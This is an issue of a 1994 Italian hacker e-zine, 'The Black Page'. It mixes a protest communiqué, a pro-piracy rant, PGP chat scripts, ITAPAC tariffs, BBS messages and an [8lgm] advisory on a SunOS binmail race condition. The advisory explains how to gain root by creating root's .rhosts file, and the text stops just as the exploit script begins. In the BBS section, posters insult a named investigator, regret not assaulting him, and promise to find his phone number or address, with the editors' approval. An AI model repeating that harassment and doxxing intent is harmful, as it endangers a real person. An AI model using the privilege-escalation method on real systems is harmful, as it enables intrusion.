bandiera della lotta all'illegalita' si e' avvitata e ha sconfinato nel diritto di esercizio delle liberta' politiche e sindacali, affiancandosi ad un uso politico della magistratura che ha prodotto nell'ultimo anno, sul solo territorio milanese, oltre 800 denuncie, decine di processi, svariate condanne estese sempre piu' ai soggetti vari con motivazioni pretestuose. sempre piu' tese all'intimidazione. Analoghi segnali ci giungono da piu' parti del paese, anche se in un quadro di differente organicita', volta quest'ultima, pensiamo, alla distruzione delle forme di visibilita' e organizzazione che questi nuovi soggetti esprimono. Tale processo non puo' eesere stato intrapreso senza la precisa intenzione di marginalizzare questo orizzonte e radicalizzarne le forme di lotta. C'e' un'intera generazione politica che, ancora una volta, viene posta di fronte a dinamiche di esclusione, all'impossibilita' di esprimere l'opposizione nelle infinite emergenze di cui e strumentalmente piena la storia di questo paese. Una generazione che dovra' assumersi dunque la responsabilita' di un rapporto con "l'illegalita' " crescente dei propri comportamenti , e dall'altro il compito di reinventare gli spazi e le forme della propria agibilita' politica sul territorio. Abbiamo inoltre rilevato in questi mesi il definitivo decesso dell'opposizione della sinistra istituzionale nella citta' di Milano, come parte di un piu' generale quadro nazionale. Una presenza questa in balia dei forti poteri che ridisegnano il territorio, che costringono il lavoro vivo presente saccheggiando quello passato, limando i redditi reali e le pensioni, che liquidano il diritto alla casa come quello alla salute, che occupano i centri del potere come fonte di interesse privato.... Non possiamo dunque maggiormente indugiare dal mettere in campo un impegno che assuma la forma, nei mesi a venire, di una mobilitazione generale della variegata presenza autogestionaria, autorganizzata, anticapitalista. Gia' nei mesi passati quest'area politico sociale ha avuto la forza di formulare, nel complesso, una rinnovata capacita' progettuale alla ricerca di un tessuto possibile tra i fili delle sue molte componenti. Una duttile allenza, dicemmo, in grado di rispondere alla necessita' di opposizione radicale che questa fase politica ci consegna. Ci sembra di poter proporre, sul complesso dei temi evidenziati in questo breve comunicato, un corteo nazionale he apra, a Milano, la stagione delle lotte sociali, il 10 settembre. Una iniziativa all'interno di tre giornate di dibattito e spettacolo (nelle date del 9/10/11 settembre) sul quale grava gia' l'ombra di un ennesimo divieto, a ribadire ulteriormente il dato di una citta' sottoposta da molti mesi ad un regime speciale per l'ordine pubblico. Il governo militare della citta', percorsa e presidiata da altrettanti mesi dalle truppe del Ministero degli Interni, e' la testimonianza palpabile della fragilita' del suuo corpo politico dirigente e della sua amministrazione. CHI GOVERNA CHI? E' la sfida che abbiamo aperto nella discussione di questa settimana, accingendoci a predisporre gli strumenti affinche' tale domanda non rimanga tale. Per intanto invitiamo tutti coloro cui questo appello e' rivolto a mobilitarsi affinche' venga affermato il diritto della liberta' di organizzazione ed espressione politica, quanto quello all'autogestione, nella citta' di Milano e in generale nel paese. A qualunque prevedibile divieto, di fronte all'esercizio di un diritto quale quello di manifestare un'opposizione reale che va dall'aurtorganizzazione all'autogestione fino all'associazionismo e alle molteplici forme della rappresentanza e della democrazia diretta, sapremo rispondere in modo adeguato e di massa, il divieto e' quindi da considerarsi un vero e proprio attacco nei confronti di chi, facendo uso della ragione, ridetermina l'opposizione in questo paese attraverso rapporti di forza stabili. L'APPUNTAMENTO PER TUTTI I COMPAGNI/E E' PER LA MANIFESTAZIONE DEL 10 SETTEMBRE A MILANO E PER UNA TRE GIORNI DI MUSICA MA ANCHE DI DIBATTITO IN LUOGO ANCORA DA STABILIRE. PER I COMPAGNI/E CHE VOGLIONO VENIRE A MILANO FATE ARRIVARE UN FAX ALLO 0339226820360. Milano, 28 Agosto Le realta' promotrici della tre giorni antifascista e antirazzista del 19-20-21 Agosto e della manifestazione del 10 Settembre. -----------------------------FINE MESSAGGI--------------------------------- Questi sono i messaggi che ho trovato ... che ne pensate ? Io ritengo che la situazione sia semplicemente TERRIFICANTE ! Se volete dire la vostra scri- vete pure alla ns redazione, IN PGP, agli indirizzi di posta elettronica che troverete in fondo alla rivista. E ricordatevi che cerchiamo sempre collabora- tori !!! Dupree's Paradise ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 12 --------------------------------------- CHI TUTELA DANNEGGIA ANCHE TE ! di M B F ----------------------------------- [N.d.R. Abbiamo trovato questo messaggio nelle aree CYBERNET. E' semplicemente FANTASTICO, sarebbe da fargli un MONUMENTO. Leggetelo, e se avete commenti in proposito, scriveteci pure.] Con l'augurio che il testo di questo msg finisca nelle mani di qualche respon- sabile della BSA, ed in riferimento all'apertra dello speciale "Italian crac- kdown" (Decoder 9), esprimo il mio parere sulla strategia di tutela software intapresa dalla suddetta associazione. Smentiamo l'"originale" slogan "Chi copia danneggia anche te !". La pirateria software puo' danneggiare rivenditore, produttore e autore del programma, ma e' priva di fondamento la dichiarazione che il fenomeno finisca col danneggiare l'utente. La duplicazione del software, sorta di concorrente invisibile al dominio delle software houses, ha sempre, ed e' storia, stimola- to in modo positivo il mercato: se il produttore non avesse avuto questa sorta di nemico fantasma contro cui combattere, giammai avrebbe offerto all'utente gadgets, assistenza post-vendita, consulenze, pacchetti a condizioni speciali. Le incriminate reti telematiche amatoriali sono oggi, pur considerato l' ine- vitabile rischio di copie abusive, il piu' grande, rapido e capillare supporto al beta-testing, allo shareware e ad altre strategie di collaudo e vendita che nessuna software house si sarebbe potuta singolarmente permettere: una colos- sale rete di presentazione, discussione e distribuzione demo del prodotto che inevitabilmente spinge diversi utenti all' acquisto dell'originale. In ogni forma ed in ogni caso, dalla diffusione amatoriale del software l'u- tente ha sempre tratto vantaggi ed i produttori, che oggi tra i miliardi in- cassati piangono miseria, anche. Si sono fatti conoscere senza spendere una lira in pubblicita' e questo porta inevitabilmente a contatto gli utenti con i prodotti originali. L'esperienza italiana ha dimostrato, dalla benzina alle assicurazioni, che le associazioni di categoria, ottenuto il controllo totale del mercato, se ne so- no sempre fottute dell'utente e, ben lungi dallo scendere in reale concorrenza tra loro, i singoli produttori si sono trovati immediatamente concordi nel- l'aumentare i prezzi e diminuire la qualita' dei servizi. I produttori di software, che non fanno eccezione, non aspettano altro che la legge sulla tutela li lasci padroni del campo in modo da poter imporre prodot- ti scadenti a prezzi maggiorati, ben sapendo che l'utente sara' costretto ad accettare per mancanza di alternative: i segnali premonitori in questa dire- zione (tipicamente riservati al nostro Paese) non mancano. Se qualcuno di voi ama testare il software, smentira' con facilita' il secondo dogma su cui poggia l'attuale concetto di tutela del medesimo: la leggenda se- condo la quale il programmatore si farebbe un culo grande come una portaerei per realizzare il prodotto. Ebbene, i programmi "leggeri" (i videogiochi, per intenderci) comportano spesso e volentieri una difficolta' di realizzo abis- salmente superiore al gestionale da prezzo milionario tanto decantato. Il realizzatore di businnes software si appoggia al sistema operativo che gen- tilmente gli processa tutte le funzioni di interfaccia utente senza fargli spendere due righe di codice, o in alternativa all'incredibile numero di li- brerie che un linguaggio ad alto livello possiede; e' inoltre piuttolto radi- cata l'abitudine di far proliferare il software commerciabile passando al col- legatore gli stessi moduli oggetto, differentemente ordinati, con le modifiche necessarie e sufficienti a non far capire al cliente che nascoste in due o tre etichette distinte ci sono in realta' le stesse routines. La disposizione del- le icone in utilities del tutto diverse, e' straordinariamente simile; in que- sto modo il programmatore evita di ricalcolarsi ascissa ed ordinata di rileva- zione evento in piattaforma grafica ed incassa n volte i diritti vendendo lo stesso modulo allo stesso utente. Piu' che i realizzatori di piattaforme, peraltro contenti delle royalities mi- liardarie che ogni giorno piovono sul loro capo, sono questi programmatori di secondo livello a premere oggi per la tutela del loro "ingegno" chiedendo i- noltre la brevettazione dell'algoritmo come supplementare metodo per realizza- re denaro (come se gli eredi di Piatgora chiedessero una somma a chiunque vo- lesse calcolare l'ipotenusa dati i cateti). Altre simpatica pratica introdotte dagli sviluppatori di software e' l'espan- sione artificiale di un file (che viene gonfiato allocando aree di memoria i- nutili o del tutto superflue) in modo da impressionare l'utente con il numero di dischetti che costituisce l'applicativo e giustificare il costo. Indimostrabile ma credibile, infine, il contributo nascosto dato (in cambio di altri favori) dai mercanti del software a quelli dell'hardware mediante la scelta di architetture sw, tutt'altro che indispensabili ed insostituibili, che obbligano l'utente a costose modifiche dell'hardware. Ora sapete cosa vuole proteggere la BSA. Essendo lo Stato il suo cliente idea- le (i ministeri italiani comprano qualunque porcata di prodotto tanto paga il contribuente), e prendendo atto del fatto che tale associazione non si e' mai premurata di mettere in discussione gli elevatissimi profitti concedendo agli enti pubblici software a condizioni agevolate (le proposte fatte sono, in ter- mini di mercato reale, una vergogna), riesaminate lo slogan e chiedetevi se di fatto il contribuente non sia piu' danneggiato da questa forma di tutela che prevede che l'utente paghi e taccia. I costi dell'adeguamento alla normativa di tutti gli enti pubblici italiani, multe comprese, li paghiamo noi tutti. Lo Stato legifera e il cittadino scuce. Ma chi tutela l'utente dai bugs del programmatore, dai crash di sistema per errata previsione dello stack, dai mostruosi errori di traduzione, dai collau- di non fatti, dalle documentazioni approssimative, dalle duplicazioni sbaglia- te dell'importatore ???? Al massimo vi ridanno una copia del software o vi fanno lo sconto (!) sulla release successiva... mentre una software house che va a rompere i coglioni in una scuola elementare perche' uno (UNO !) dei files installati non e' regi- strato e poi rilascia un eseguibile con bug, dovrebbe sputare sangue per paga- re un fiume di danni, essere rovinata per sempre. Perche' alla software house e' stato concesso il diritto di chiedere centinaia di biglietti da mille per una manciata di righe di compilato mentre se il mio fornaio chiede 50mila per una pagnotta arrivano (giustamente) i Carabinieri ?? Qualcuno ha la coda di paglia, teme che l'utente abbia il materiale per fare dei confronti e per scoprire le sporche manovre dei signori del software... allora si chiudano le reti, si proibisca la duplicazione a tutti i livelli, si promuova una campagna delatoria nazista del tipo "denunciate il vicino di casa che copia!" (non e' uno scherzo, purtroppo! Ci sono i tagliandi prestampati per la denuncia su giornali e riviste) cosi' finalmente anche i prodotti sca- denti troveranno spazio, l'utente sara' fottuto ancora una volta e gli adepti della BSA continueranno a sguazzare nel denaro ridendo alla faccia nostra! M F B [N.d.R. Sono commosso ! Sigh ! ;'( ] ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 13 [N.d.r. Questo file e' in INGLESE. Rompetevi le corna. *;) ] From: jabowery@netcom.com (Jim Bowery) Subject: PGPCHAT Release 1.0 Date: Mon, 6 Jun 1994 19:45:05 GMT PGP WIN-DOS CHAT --- --- Release 1.0 A MODEM-CHAT FACILITY WITH PRETTY GOOD PRIVACY by Jim Bowery PGP Win-DOS Chat is a sloppy little facility which allows people to conduct a rather slow 2-way PGP-encrypted chat via modems. It requires Telix (the comm program), so if you don't have Telix, get a copy and make sure you have the "cs.exe" Telix script compiler with it. It requires PGP. You should be familiar with encrypting and decrypting messages with PGP before you attempt to run this facility. It uses default key rings and for decryption it uses your default private key. This has only been tested under Windows NT so if it doesn't work under a non-preemptive Windows like 3.1, that's probably why. INSTALLATION I) You should probably make sure your PGP "config.txt" file contains a line that says: VERBOSE = 0 This is to keep the PGP "noise" messages from interfering with your chat. II) There are 3 script files included below. Follow the directions for the installation of each of them. FILE: sendpgp.bat The following batch file should be placed in your PGP directory with the name sendpgp.bat. ------------------------- CUT HERE ------------------------- echo off rem Run this with one argument -- PGP userid of person you are sending to. rem Be sure to set PGPPASS in environment. :abc echo Enter PGP chat message (end with CTRL-Z): copy con sendpgp.txt :def if exist sendpgp.asc goto def pgp -esa sendpgp.txt %1 del sendpgp.txt goto abc ------------------------- CUT HERE ------------------------- FILE: recvpgp.bat The following batch file should be placed in your PGP directory with the name recvpgp.bat. ------------------------- CUT HERE ------------------------- echo off rem Receives PGP chat messages. Be sure to set PGPPASS in environment. :abc if not exist recvpgp.pgp goto abc pgp recvpgp.pgp -o recvpgp.txt type recvpgp.txt del recvpgp.txt del recvpgp.pgp goto abc ------------------------- CUT HERE ------------------------- FILE: pgpchat.slt The following Telix script should be placed in your Telix directory with the name pgpchat.slt. If your PGP directory is somewhere other than "\pgp\" relative to your Telix directory, you will have to edit "pgpchat.slt" and change all references to the "\pgp\" path to the path of your PGP directory relative to your Telix directory. Then you should execute the command: C:\telix>cs pgpchat.slt This will generate a file named "pgpchat.slc" which is your Telix script executable. ------------------------- CUT HERE ------------------------- main() { int t1; str buf[80]; t1=track("-----END PGP MESSAGE-----",0); capture("\pgp\recvpgp.asc"); while (1) { terminal(); if(track_hit(0) == t1){ capture("*CLOSE*"); frename("\pgp\recvpgp.asc","\pgp\recvpgp.pgp"); capture("\pgp\recvpgp.asc"); } if(filefind("\pgp\sendpgp.asc",0,buf)){ frename("\pgp\sendpgp.asc","\pgp\sendasc.txt"); type_file("\pgp\sendasc.txt"); fdelete("\pgp\sendasc.txt"); } delay(10); } } type_file(str fname) { int f; str buf[100]; int ichar, lines_sent = 0; f = fopen(fname, "r"); if (!f) return -1; host_send("^M^J"); while (1) { if (fgets(buf, 80, f) == -1) { fclose(f); return 1; } host_send(buf); host_send("^M^J"); terminal(); } } ////////////////////////////////////////////////////////////////////////////// host_send(str outstr) { cputs(outstr); } ////////////////////////////////////////////////////////////////////////////// ------------------------- CUT HERE ------------------------- STARTING UP PGP WIN-DOS CHAT 1) >From the Windows Program Manager, bring up three DOS Prompt windows. 2) In one window, enter the PGP directory and execute: C:\pgp>SET PGPPASS= C:\pgp>recvpgp 3) In another window, enter the PGP directory and execute: C:\pgp>SET PGPPASS= C:\pgp>sendpgp Where is the PGP userid you would use to encrypt a message to the person you will be chatting with. 4) In the third and last window, enter the Telix directory and execute: C:\telix>telix 5) To test out your end of the chat system without bothering your friends, make sure your modem is echoing your commands by typing: ATZ It should echo the "ATZ" on your terminal screen and respond with "OK". 6) Press ALT-G in Telix and enter "pgpchat" at the prompt to activate the Telix script. 7) Activate the "sendpgp.bat" window. You should see the prompt: "Enter PGP chat message (end with CTRL-Z):" 8) Do what the prompt says. It should then begin encrypting what you typed and return you to the prompt. You should then see the Telix window scroll (painfully slowly) a PGP encryption block. Sometime later, the "recvpgp.bat" window should display the same message you entered in the "sendpgp.bat" window. If so, your end of the system is working. CAVEAT: You WILL see errors crop up in about 1 in 5 test messages that you try to send. This is due to the fact that the "self-test" is using the modem's character echo to simulate the presence of another user and the modem will, from time to time, see an "AT" command in the middle of a PGP encyption block. When this happens, you should see a modem response in the middle of the PGP encryption block on the Telix screen and PGP error messages later cropping up on the "recvpgp" screen. Ignore these errors. 9) Go to the Telix window and press ALT-X to quit Telix. 10) Reenter Telix, but this time, hold off on executing the "pgpchat" script. 11) Dial your friend's modem and make sure you are connected. 12) Once the modem connection is established with your friend, press ALT-G in Telix and enter "pgpchat" at the prompt to activate the Telix script. 13) Activate the "sendpgp.bat" window and start typing. You should see your friend's messages pop up in the "recvpgp.bat" window. When you are ready to quit, just kill all three DOS windows. TIPS ON USAGE I) Don't send more than about a message per 30 seconds. If you send faster than that, the PGP data stream might get backed up. The flow control is there but it is minimal. II) You can send text files by the following procedure: 1) Go into Windows' Notepad program and open the file you want to send. 2) Press SHIFT-CONTROL-END to select the entire file. 3) Press CONTROL-INS to copy the file to your clipboard. 4) Reactivate the "sendpgp.bat" window. 5) Press SHIFT-SPACE. 6) Press "e". 7) Press "p". 8) Press CONTROL-Z This should cause the entire text file to be typed into your "sendpgp.bat" window, encrypted and sent to your friend. III) Your and your friend may have a bit of trouble reading more than 25 lines of text at a time since the "recvpgp.bat" window just scrolls off the top (its just a DOS window after all). You might want to run that DOS window under one of the "scroll buffer" programs that lets you scroll back and see what has scrolled off the DOS prompt window. ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 14 -------------------------- LE NUOVE TARIFFE DI ITAKAZ -------------------------- Sembrano convenienti, ma non ancora. Date un'okkiata ... se usata con parsimonia, una buona NUI affittata potrebbe anche essere "fattibile". Aggiornato al 31.2.94 X.28 COMMUTATO ============== Tariffe di Accesso ================== Canone di abbonamento menisile L. 12.500 ^^^ Modem Multistandard (vedi listino modem) Traffico Nazionale - Tariffa telefonica per il collegamento alla centrale ITAPAC - per ogni chiamata L. 20 - occupazione porta (per ogni minuto) L. 20 Collegamento su ITAPAC: - per ogni minuto L. 5,5 - per ogni segmento fino a 200.000 seg./mese L. 1,2 oltre 200.000 seg./mese L. 0,7 Riduzioni sul traffico ---------------------- Dalle ore 22 alle ore 7 di ogni giorno, il sabato e i giorni festivi si applicano le seguenti tariffe ridotte: - per ogni minuto L. 2 - per ogni segmento fino a 200.000 seg./mese L. 0,36 oltre 200.000 seg./mese L. 0,21 Prestazioni opzionali --------------------- Gruppo Chiuso d'Utente (CUG) utente responsabile L. 56.000/mese utente di CUG L. 1.000/mese Documentazione Addebiti L. 35 per ogni chiamata virtuale documentata Modifica NUI (password), opzioni, parametri L. 50.000 Aggiornato al 1.4.93 TRAFFICO INTERNAZIONALE ======================= Le tariffe di seguito descritte valgono per ogni tipo di accesso. Europa e Bacino Paesi Extraeuropei del Mediterraneo Tariffa a tempo Tariffa a tempo --------------- --------------- fino a 200 ore/mese fino a 200 ore/mese L. 86,4/min. o fraz. L. 198,018/min. o fraz. oltre 200 ore/mese oltre 200 ore/mese L. 60,48/min. o fraz. L. 138,618/min. o fraz. Traiffa a volume Tariffa a volume ---------------- ---------------- ^^^ fino a 200.000 seg./mese fino a 200.000 seg./mese L. 51,84 / 10 seg. o fraz L. 118,8 / 10 seg. o fraz. oltre 200.000 seg./mese oltre 200.000 seg./mese L. 36,288 / 10 seg. o fraz. L. 83,16 / 10 seg. o fraz Abbiamo anche evidenziato un po' di errori di stampa. Fonte dell'Informazione : Info Itakaz, NUA 26100298 (Id Itapac Itapac al login) ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 15 AT OK ATD CONNECT 28.800/VAF/FAN/CULO E adesso sorbitevi anche queste ========================================================================= SSSSSS TTTTTTT RRRRR OOOO N N ZZZZZZ AAAA TTTTTTT EEEEEE !! S T R R O O NN N Z A A T E !! S T R R O O N N N Z A A T E !! SSSSS T RRRRR O O N N N Z AAAAAA T EEEEE !! S T R R O O N N N Z A A T E !! S T R R O O N NN Z A A T E SSSSSS T R R OOOO N N ZZZZZZ A A T EEEEEE !! ========================================================================= ________________________________________________________________ A grande richiesta ecco la famosa "mucca che caga" di Sxs!!!!!!! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (__) <---- queste sono un paio di corna... /oo\\________ \\ / \\ \\/ / \\ <---- questa e' la mucca.... \\_|___\\_|/.\\ || YY| o ' || || O <---- e questa e' la cacca..... ^^ ^^ Beh, con il tacito permesso di Sxs che ha postato tempo fa questa sua creazione su Ultimo Impero BBS (Si, proprio loro, quei FOTTUTI COGLIONI della Redazione di TGM che SPUTTANANO i file .MOD inserendo il loro BANNER DEL CAZZO rovinando l'intestazione dei moduli e spesso cancellando i nomi dei veri autori dei suddetti, per mettere invece il nome ed il numero della loro MERDO- SA BBS DEL CAZZO, che fa cagare mezzo mondo, col suo incasinatissimo CNET che nessuno ci capisce mai un CAZZO e infatti NON LO USA NESSUNO ...), dicevo, col permesso di Sxs useremo questa sua meravigliosa creazione come Banner della nostra rubrichina. Che non e' necessariamente una rubrica di stronzate, ma un insieme di co- se prese qua' e la' in vari posti, pervenuteci ai ns indirizzi EMAIL o lette nei giornali ecc. ecc. Sta a voi distinguere le EMERITE STRONZATE dalle INFO ELITE dai MSG Di- vertenti a quel che cazzo volete. Fate un po' voi !!! Sxs : Se sei contrario a cio' di cui sopra, hai l'indirizzo Email a cui scrivere ! ;) Alcuni dei messaggi sono stati "censurati" dalla redazione per evitare problemi. Se siete contrari a cio', o favorevoli, scriveteci e fateci sapere cosa ne pensate. Bene, si comincia !!!! ---------------------- ---------------------------------------------------------------------------- Messaggeria Black Jack (compianta NUA 21124062 :( ora solo da VDT ma non so la pagina) Area : Sysop MSG N. 2230 Del: 02-06-94 21:03:02 Di: PhalanX in nome di una ristretta cerchia di persone che irridono al clericalismo e che aborriscono chiunque tenti di giustificare l'essenza delle cose in base a preconcetti mistici, io chiedo formalmente l'apertura di un'area destinata allo scambio di invettive contro la simbologia (e si badi: solo essa, e NON i concetti) clericale e religiosa in genere. Mi candido alla moderazione, ben conscio delle capacita' di moltri altri utenti in materia. --------------------------------------- Msgr. Arkimede Area GENERALE Mitt JOE Data 28/08/94 02:17:18 Msg#1495 1/1 Object: ore 2.15 Un'altra partenza. L'estate volge al termine minuto dopo minuto. E' forse come svegliarsi da un sogno. Viva la Guinness. Le ore piccole e le grandi donne. Viva me. Joe p.s.: chissa' qual'e' la verita'. --------------------------------------- Decoder BBS Area: Dibattito CyberPunx Msg#: 6647 Date: 20 Aug 94 17:33 From: Ice Man Read: Yes Replied: Yes To: All Mark: Subj: Ai mie tempi c'era la guerra! ... E voi pensevate ke fosse finita??? da "LA STAMPA" di Sabato 20 Agosto.. Le indagini telematike di uno studente ingaggiato dai giudici di milano U N D E T E C T I V E D E L C Y B E R S P A Z I O Cosi' ho katturato i pirati informatici -> Riporto solo i pezzi piu interessanti... ...Cotrozzi Massimo la vita la passa per meta' a Milano e per meta' nel suo computer. 12 ore in un posto 12 ore in un altro. Lo ingaggiano le socita' commerciali per proteggere dalle intrusioni le loro banke dati, lo ingaggiano i giudiciper skoprire i kolpevoli dei reati di pirateria informatika. -> Ok kazzo kuesto mi sempra gia di averlo letto ... solo ke era su un libro di sterling!!! ma il meglio deve ankora venire!!! ...Massimo Cotrozzi laureato in informatica nove annni poassati a viaggiare tra terra e cyberspazio a skoprire i segreti della informatica, a capire come si violano le difese telematike e kome si possono renderle meno vulnerabili, a interpretare la filosofia degli hacker e kuella dei crekers. -> In pratika sto stronzo si e' fatto una 15ina di sistemi ha preso le sue nui si sara' fatto passae le frekuenze per boxare e un giorno si e' svegliato e ha detto... Kazzo mi annoi di nuovo!!!! Ke faccio?? bhe adesso passo dalla parte opposta!!!!! Te lo diko kon tutto il kuore e spero ke sto messaggio tu lo legga karo il mio Cotrozzi S T R O N Z O ! E pregerei tutti a unirsi al mio koro!!!! Ma riprendiamo l' artikolo!! "...Io passo molte ore sulle Chat-Line degli hackers. Ieri sera parlavo con uno ke era al komputer da 36 ore di file ed era gia' entrato in 12 sistemi. Seguo unsando uno pseudonimo e collegandomi da un telefono diverso da kuello registrato le loro konversazioni. -> Dunke appurato ke sto kui' e' stronzo dalla testa ai piedi prosegiuamo... Chat-line pirata???????? seee mo han fatto la 144-xxx-xxx _Hacker in linea. Bho si sapessa al meno spiegare... E non ho klapito perke' usa un altro telefono ke ha paura ke sulle bbs lo traccino? Komunku l'artikolo kontinua ma direi ke ho reso l' idea!!!!! ultima kikka per finire... "...Sono (relativo agli hackers NdS) infiltrati dovunkue e io sono infiltrato tra di loro..." -> Ekko kon sta frase delle balle da film di 4o ordine finisko il mex. Il bello e ke sto stronzo ne va' pure fiero di kuello ke ha fatto!!!!!! Il giudizio hai posteri ma intano la nomina di STRONZO DEL MILLENIO mi pare abbia trovato il suo vincitore!!!! ... -**- TURN ON YOUR BRAIN <=--------=> FREE YOUR MIND -**- -!- Blue Wave/RA v2.12 [NR] ! Origin: ---> ECN_TO +39-11-6507540 <--- (45:1917/2.0) SEEN-BY: 1/1 5/1 9/1 10/2 30/1 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 1500/1 SEEN-BY: 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 [ N.d.r. STROOOOOOONZOOOOOOOOOOOO!!!!!!!!!!!!] ============================================== Msg#: 7468 Date: 02 Sep 94 00:56 From: MainMan Read: Yes Replied: No To: All Mark: Subj: News sulla merdaccia... ops, Cotrozzi... From: mainman@cubalibre.crn.gaia.it (MainMan) Ciao a tutti!!! Ho novita` sul faccia di merda... che e` una vecchia conoscenza al Poli a Milano... e` noto per essere una testa di cazzo, anche grande, oltre che un idiota colossale... A quanto pare e` totalmente un infame, in quanto ex-hacker egli stesso, anche se piuttosto LAMA... Ma il bello deve ancora venire... Forse ricorderete quando il Leonka doveva andare in via Adriano, che dei gruppetti di teste di cazzo protestavano animatamente... uno di loro era rimasto lievemente ferito... ecco, era proprio il "nostro"... peccato non averlo steso quando ce n'era la possibilita`... Comunque vedo di riuscire ad avere almeno un numero di telefono, se non addirittura l'indirizzo... ;-) -- c u l8r by Brian Key fingerprint = 5B 8C 55 64 98 4E AF 64 61 E4 8A 12 2F F7 9B A1 -!- ifmail v.2.4 ! Origin: Cyber Rights Now! (65:1400/5@cybernet) SEEN-BY: 1/1 5/1 9/1 10/2 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 2 3 4 SEEN-BY: 1400/5 1500/3 1600/1 1800/1 1900/1 2000/1 --------------------------------------- Msgr. Arkimede Area Lo Sfogatoio Mitt JOE Data 20/06/94 20:46:22 Msg_651 1/1 Object: Quando dico certe cose vorrei crepare di botto. Non cio' ce ho detto. Altro. Ancora prima. --------------------------------------- BBS DECODER Area: Dibattito CyberPunx Msg#: 5769 Date: 30 Jul 94 08:28 From: H.P.F.S. Read: Yes Replied: No To: Fox Lodari Mark: Subj: Point.Linux [Fox] IO SONO DIVENTATO KOSI: -=@|-#> ti sembra possibile ridursi kosi`??? A me no !!! Perkui mi devi dare, prima che mi venga un esaurimento da FACCINE la configurazione del Point per LinuX, oppure la versione del BT che hai tu modificata per LinuxXX (acc.. sto diventando proprio nevrastenico, ho smesso di scrive con la K) Pleeeeeeaaaaaaaaassssssseee!!!! -!- Acropolis Mailer 0.92 ! Origin: LiWixARD.dot.four (65:1100/5.4) SEEN-BY: 1/1 4/1 5/1 9/1 10/2 999/999 1000/1 4 1100/1 2 5 6 7 1200/1 2 SEEN-BY: 1200/5 6 1400/1 1500/1 1600/1 1800/1 1900/1 2000/1 Msg#: 5784 Date: 01 Aug 94 19:32 From: The creeper Read: Yes Replied: No To: Spirito libero (e ficcante) Mark: Subj: Bad smell A parte la puzza delle tue ascelle marce si sente anche un vago odore di vorrei ma non posso. Anzi. Il ficcante contenuto delle tue proposizioni balorde ha gettato nello sconforto persino il mio cactus che, gia' sofferente di aerofagia, sta scoppiettando nel vaso, e, nel delirio dell'estate indiana, cerca un culo in cui trovare riparo. Forse ti puo' interessare. Msg#: 5895 Date: 12 Mar 94 17:23 From: Enzo Catania Read: Yes Replied: No To: Virtualcip Mark: Subj: Un uomo, una vergogna! In un messaggio di 31 Jul 94 Virtualcip dicevi a Marco Venturini Autieri: V> ... Emilio Fede ci ha rotto i coglioni!!!! Liguori e' riuscito a fracassare anche le briciole! :-) ____ _ / ( ) 69th Point of ECN /arro/__ Azzz! Msg#: 5946 Date: 05 Aug 94 21:09 From: The creeper Read: Yes Replied: No To: All Mark: Subj: Holy..days il g0vern0 va in vaccanza www no- in va-c-anza man-c-anza e noi in suddit-anza ci riempiremo la p-anza delle stronzate concime per poveri illusi elettori (sic) ma, si sa, i maroni estivi non sono meno gonfi di quelli invernali ALLARME ALLARME! Demagogia( Bugia! --------------------------------------- ---------------------------------------------------------------------------- Introduction to [8lgm] Advisory Releases ---------------------------------------------------------------------------- In the light of the current move towards openness in the discussion of compu- ter security related matters, the [8lgm] team have decided to release some of their back catalogue of [8lgm] advisories previously unavailable to outsiders. Those advisories deemed suitable for publication are known to the relevant or- ganisations concerned (e.g. CERT). However, these vulnerabilities have not been given the publicity required so that system administrators can correct the problem. In most cases, fixes are currently available; please contact your vendor directly for patch details. [8lgm] was created in early 1989 by several individuals with a common interest in computer security. Up until 1991, [8lgm] members actively used vulnerabi- lities to obtain access to many computer systems world-wide. After this pe- riod, any results of research have been reported and passed onto vendors. Ho- wever, this work has been carried out on a limited number of platforms, so the true extent of any vulnerability is currently unknown. If the problem described in any advisory is discovered to affect operating sy- stems not mentioned, please e-mail [8lgm] at 8lgm@bagpuss.demon.co.uk, giving full details so that this information can be added to the bug database. Please do not hesitate to contact [8lgm] with any questions related to compu- ter security. An [8lgm] team member will deal with your enquiry in the stric- test of confidence, and provide assistance whenever required. 8lgm-bugs@bagpuss.demon.co.uk (To report security flaws) 8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories) 8lgm@bagpuss.demon.co.uk (General enquiries) This introductory file and the advisories mentioned have been forwarded to the following newsgroups and mailing lists. comp.security.unix INFOHAX BUGTRAQ CERT/CC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAi138foAAAEEANMr/+dGdcMgmK6p61OjhUVUEnqRBvlX6PZa/1wM1hziNJgV q/VIkLqYpMUIGRYWs2NS/WgF6N1BldXib2EbZ3MNjR5fYeMnwu2amTfGkkcl9IYQ t3xj0/g69tPYJvlmcLdDx787b6UlIKT9xF+5Z5pCZp0QEyU/CtKRWea3gAuFAAUR tCFbOGxnbV0gPDhsZ21AYmFncHVzcy5kZW1vbi5jby51az4= =ivMN -----END PGP PUBLIC KEY BLOCK----- --------------------------------------- From 8lgm@bagpuss.demon.co.uk Fri May 6 22:49:11 EDT 1994 This advisory has been sent to: comp.security.unix BUGTRAQ CERT/CC Sun Microsystems =========================================================================== [8lgm]-Advisory-6.UNIX.mail2.2-May-1994 PROGRAM: binmail(1) (/usr/bin/mail) VULNERABLE OS's: SunOS 4.1.x with Sun's latest binmail patch - 100224-07. DESCRIPTION: Sun released a patch 100224-07 to fix the problems described in [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992. After 5 weeks, Sun have produced a fix which will defeat our original script, but the original problem remains, and is now even worse then the original! The old race condition still exists in the patched binmail(1), which allows files to be created in arbitrary places on the filesystem. These files can be owned by arbitrary (usually system) users. A new problem allows 0 length files to be created anywhere in the filesystem, even without a race. IMPACT: Any user with access to binmail(1) can become root. REPEAT BY: This example demonstrates how to become root on most affected machines by creating root's .rhosts file. Please do not do this unless you have permission. Note that this script will only create new files, not append to existing ones (as did the one in the previous advisory). A variation on this script could easily be written to append to existing files. On the other hand, you are now virtually guaranteed to win this race, which is what makes this problem worse than the original. Create the following file, 'mailscript2': 8<--------------------------- cut here ---------------------------- #!/bin/sh # # 